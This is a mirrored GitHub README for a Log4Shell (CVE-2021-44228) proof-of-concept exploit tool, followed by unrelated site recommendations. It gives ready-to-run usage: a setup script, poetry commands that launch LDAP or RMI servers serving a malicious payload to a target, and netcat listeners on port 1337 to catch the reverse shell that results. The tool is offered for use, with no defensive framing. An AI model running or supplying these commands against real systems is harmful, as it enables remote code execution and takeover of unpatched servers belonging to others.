Giter VIP home page Giter VIP logo

log4shellexploit's Introduction

Log4shell POC

[!] CVE: CVE-2021-44228

[!] Based on https://github.com/kozmer/log4j-shell-poc

[!] And https://www.veracode.com/blog/research/exploiting-jndi-injections-java

[!] And https://github.com/cyberxml/log4j-poc

[!] But with poetry and simple to run :) by @shoxxdj

Usage :

First time, run the run_me_first.sh script.

./run_me_first.sh
poetry install
poetry run log4shell --userip listenerIP --lport netcatPort

Options :

Log4Shell Exploit Tool

options:
  -h, --help         show this help message and exit
  --userip USERIP    Enter IP for LDAPRefServer & Shell
  --webport WEBPORT  listener port for HTTP port
  --rmiport RMIPORT  listener port for RMI server
  --lport LPORT      Netcat Port
  --ljava LJAVA      Local Java Binaries Location
  --gen GEN          Generate multiple payloads
  --method METHOD    LDAP or RMI or all
  --references       Print references

Examples :

Ldap server

Shell1:
  poetry run log4shell --userip X.X.X.X --lport 1337 --method ldap
Shell2:
 nc -lvp 1337

Rmi server

Shell1:
 poetry run log4shell --userip 192.168.1.65 --lport 1337 --method rmi
Shell2:
 nc -lvp 1337

Rmi with custom port:

Shell1:
 poetry run log4shell --userip 192.168.1.65 --lport 1337 --rmiport 7777 --method rmi
Shell2:
 nc -lvp 1337

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.